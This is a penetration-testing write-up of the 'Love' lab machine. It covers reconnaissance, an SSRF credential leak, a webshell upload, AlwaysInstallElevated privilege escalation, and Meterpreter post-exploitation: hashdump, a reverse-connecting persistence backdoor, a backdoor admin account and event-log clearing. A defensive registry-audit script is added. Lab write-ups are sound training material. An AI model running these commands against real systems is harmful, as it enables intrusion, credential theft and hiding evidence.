Love has been Pwned !

Category: Reverse Engineering


Reconnaissance

Full port scan plus service detection

Mapping the attack surface

Asset expansion (domains)

  • hosts-file collision: domain names leaked by the TLS certificate

Information expansion (directories)

dirb http://10.10.10.239:80/
dirb http://10.10.10.239:5000/
dirb http://staging.love.htb/
dirb http://love.htb/

Vulnerability probing (ports)

  • Weak passwords, enumeration and guessing: 139/445/135/3306

  • n-day vulnerabilities, black-box testing: 80/5000

Vulnerability exploitation (Windows)

  • ms17-010

  • cve-2020-0796

nmap -p445 --script smb-vuln-ms17-010 10.10.10.239
nmap -p445 --script cve-2020-0796 10.10.10.239

Perimeter breach

  • sqli -> sqlmap -> shell (omitted)

  • ssrf -> credentials -> file upload -> shell

At http://staging.love.htb/beta.php the echoed SSRF response hands over the account credentials (somewhat contrived)

admin/@LoveIsInTheAir!!!!

Log in to the admin panel

Find the upload point and upload a Godzilla webshell

http://love.htb/images/xlove.php

Maintaining access

MSF

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Privilege escalation

Misconfiguration privesc: registry (AlwaysInstallElevated)

The AlwaysInstallElevated registry setting is a policy item that allows low-privileged users to run installer packages with SYSTEM privileges. Once this policy is enabled, a low-privileged user can run a malicious MSI as SYSTEM.

That is, when its value is 1, the machine runs MSI packages as SYSTEM by default.

Check the AlwaysInstallElevated value

# currently enabled
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Upload the malicious MSI to the target

upload /home/kali/Desktop/HackTheBox/x.msi c:/xampp/htdocs/omrs/x.msi

Run it silently

msiexec /quiet /qn /i x.msi

SYSTEM privileges obtained.
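As an added defender's check (my example, not from the writeup): parse the output of the two reg query commands above and report whether the policy is actually in force. Windows Installer only honours AlwaysInstallElevated when the value is 1 in both HKLM and HKCU, so querying one hive alone is misleading; the reg.exe sample output below is constructed, and on a Windows host the script runs reg.exe itself.

```python
"""Audit check for AlwaysInstallElevated (added example, not from the writeup).
Windows Installer only honours the policy when the value is 1 in BOTH HKLM and
HKCU; a missing key or value in either hive means it is not in force."""
import re
import subprocess
import sys
from typing import Optional

KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\Software\Policies\Microsoft\Windows\Installer",
}

# reg.exe prints the value as:  AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+)\s*$", re.MULTILINE
)


def parse_reg_query(output: str) -> Optional[int]:
    """Return the DWORD from `reg query` output, or None if the value is absent."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def assess(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hives: the policy is in force only if both read 1."""
    hklm, hkcu = parse_reg_query(hklm_output), parse_reg_query(hkcu_output)
    return {"HKLM": hklm, "HKCU": hkcu, "misconfigured": hklm == 1 and hkcu == 1}


def query_hive(path: str) -> str:
    """Run reg.exe on a live Windows host; error text simply parses to None."""
    proc = subprocess.run(["reg", "query", path, "/v", "AlwaysInstallElevated"],
                          capture_output=True, text=True)
    return proc.stdout + proc.stderr


# Constructed sample output, modelled on what reg.exe prints on a vulnerable host.
SAMPLE_HKLM = ("\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
               "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n")
SAMPLE_HKCU = ("\r\nHKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer\r\n"
               "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n")
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\r\n"

if __name__ == "__main__":
    if sys.platform == "win32":
        print(assess(query_hive(KEYS["HKLM"]), query_hive(KEYS["HKCU"])))
    else:
        print(assess(SAMPLE_HKLM, SAMPLE_HKCU))      # -> misconfigured: True
        print(assess(SAMPLE_HKLM, SAMPLE_MISSING))   # -> misconfigured: False
```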

Credential harvesting

run hashdump
run windows/gather/smart_hashdump


Persistence

Startup-item backdoor

# -X start at boot
# -i reverse-connection interval
# -r attacker's IP
run persistence -X -i 2 -p 4446 -r 10.10.14.90

Remote login

# take a screenshot
screenshot

# enable Remote Desktop on the target
run getgui -e
run post/windows/manage/enable_rdp

As shown, port 3389 is now open

# create an account
net user xLove 123456 /add
# add it to the administrators group
net localgroup administrators xLove /add

Connect to it

Covering tracks

# disable Remote Desktop
net user xLove /del   # delete the backdoor account
clearev               # clear the event logs


This article was first published on the WeChat public account don9sec: Love has been Pwned !